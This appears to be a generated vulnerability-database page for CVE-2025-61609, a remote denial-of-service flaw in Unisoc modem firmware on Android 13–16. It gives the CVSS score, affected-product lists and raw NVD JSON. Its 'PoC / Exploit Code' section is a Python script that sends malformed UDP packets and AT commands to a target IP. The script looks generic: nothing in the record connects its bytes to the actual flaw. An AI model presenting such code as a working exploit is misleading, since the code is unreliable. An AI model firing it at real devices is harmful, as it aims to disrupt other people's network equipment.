Security Vulnerability Report
中文
CVE-2025-61609 CVSS 7.5 HIGH

CVE-2025-61609

Published: 2025-12-01 08:15:48
Last Modified: 2025-12-02 15:53:44
Source: [email protected]

Description

In modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE
Unisoc Modem Firmware(具体版本需参考官方公告)
紫光展锐调制解调器固件(相关版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61609 PoC - Unisoc Modem Denial of Service # This PoC demonstrates sending malformed packets to trigger the vulnerability # Note: For authorized security testing only import socket import struct import random def create_malformed_packet(): """Create a malformed packet that triggers input validation issue""" # Craft a packet with invalid length or format # This exploits improper input validation in modem firmware packet = b'\x00\x01\x02\x03' # Malformed header packet += struct.pack('>H', random.randint(0, 65535)) # Random sequence packet += b'\xff\xfe\xfd' # Invalid markers packet += b'A' * 100 # Oversized payload return packet def send_dos_packet(target_ip, port=80): """Send denial of service packet to target modem""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) malformed_packet = create_malformed_packet() sock.sendto(malformed_packet, (target_ip, port)) sock.close() print(f"Malformed packet sent to {target_ip}:{port}") except Exception as e: print(f"Error: {e}") def exploit_modem_at_interface(target_ip): """Send malicious AT command to trigger vulnerability""" # Malformed AT commands that bypass validation malicious_commands = [ b'AT+INVALID_CMD\r\n', b'AT\x00\xff\xfe\r\n', b'AT+CGATT=\xff\r\n' ] try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, 5000)) for cmd in malicious_commands: sock.send(cmd) sock.close() print("Malicious AT commands sent") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": # Target configuration target = "192.168.1.100" # Replace with actual modem IP print("CVE-2025-61609 PoC - Unisoc Modem Input Validation Issue") send_dos_packet(target) exploit_modem_at_interface(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61609", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:48.437", "lastModified": "2025-12-02T15:53:43.707", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el Módem, existe una posible caída del sistema debido a una validación de entrada incorrecta. Esto podría llevar a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.